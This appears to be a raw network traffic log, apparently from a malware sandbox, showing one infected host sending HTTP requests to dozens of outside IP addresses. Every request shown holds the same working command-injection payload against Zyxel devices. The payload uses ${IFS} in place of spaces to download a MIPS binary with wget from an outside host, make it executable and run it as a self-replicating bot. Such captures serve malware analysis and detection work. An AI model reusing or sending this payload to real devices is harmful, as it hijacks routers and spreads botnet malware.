                                                        Feb 2, 2024 06:20:57.680252075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1397192.168.2.1448480118.62.55.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680286884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1398192.168.2.1447460164.42.150.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680330992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1399192.168.2.145755014.32.39.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680366993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1400192.168.2.1457528162.238.206.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680413008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1401192.168.2.1453070189.40.3.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680471897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1402192.168.2.1439546192.70.31.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680500984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1403192.168.2.1455244171.45.154.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680565119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1404192.168.2.143975876.252.57.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680612087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1405192.168.2.144119482.163.98.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680649996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1406192.168.2.1440580198.88.17.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680676937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1407192.168.2.144125684.177.226.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680712938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1408192.168.2.1454962179.239.135.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680777073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1409192.168.2.144732640.17.147.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680794954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1410192.168.2.1433716219.15.209.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680825949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1411192.168.2.145455096.67.171.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680859089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1412192.168.2.143439671.40.102.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680880070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1413192.168.2.143767091.177.240.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680939913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1414192.168.2.1440868160.213.34.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680968046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1415192.168.2.145237613.140.199.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681008101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1416192.168.2.1452360143.132.106.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681037903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1417192.168.2.1443004157.107.131.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681067944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1418192.168.2.1455870125.39.240.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681099892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1419192.168.2.1446692104.245.79.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681147099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1420192.168.2.144147044.84.213.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681178093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1421192.168.2.1445868196.162.154.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681217909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1422192.168.2.144326638.119.133.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681272030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1423192.168.2.144986490.211.66.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681305885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1424192.168.2.145618232.127.117.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681355953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1425192.168.2.1432804163.244.61.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681410074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1426192.168.2.145422441.139.223.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681440115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1427192.168.2.1459870152.6.41.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681489944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1428192.168.2.1439808209.67.99.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681524992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1429192.168.2.1455744168.243.252.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681561947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1430192.168.2.1440402206.213.188.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681606054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1431192.168.2.1435134162.152.169.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681637049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1432192.168.2.1451852146.146.162.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681657076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1433192.168.2.145640414.136.213.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681694031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1434192.168.2.144129276.39.180.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681725025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1435192.168.2.1432826109.88.162.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681778908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1436192.168.2.144802496.104.17.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681812048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1437192.168.2.1452758116.100.162.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681843042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1438192.168.2.1455828130.11.79.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681864977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1439192.168.2.1448874143.150.52.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681921005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1440192.168.2.1433134135.1.85.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681941986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1441192.168.2.1458680125.234.3.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.681976080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1442192.168.2.1455896147.24.123.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682017088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1443192.168.2.144142840.129.219.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682043076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1444192.168.2.1453910177.229.54.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682089090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1445192.168.2.1437602208.241.11.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682123899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1446192.168.2.144754441.139.4.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682173967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1447192.168.2.143943424.12.179.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682212114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1448192.168.2.1436224129.84.187.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682255983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1449192.168.2.145988034.249.82.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682285070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1450192.168.2.145303663.171.254.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682346106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1451192.168.2.145134641.88.148.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682368994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1452192.168.2.143583492.206.219.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682420969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1453192.168.2.1455778199.170.156.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682452917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1454192.168.2.1439192198.40.41.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682483912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1455192.168.2.145220642.10.207.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682521105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1456192.168.2.1459132104.210.35.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682550907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1457192.168.2.1458220171.94.248.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682593107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1458192.168.2.143501460.46.140.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.682638884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1459192.168.2.14364624.71.150.110443
                                                        TimestampBytes transferredDirectionData
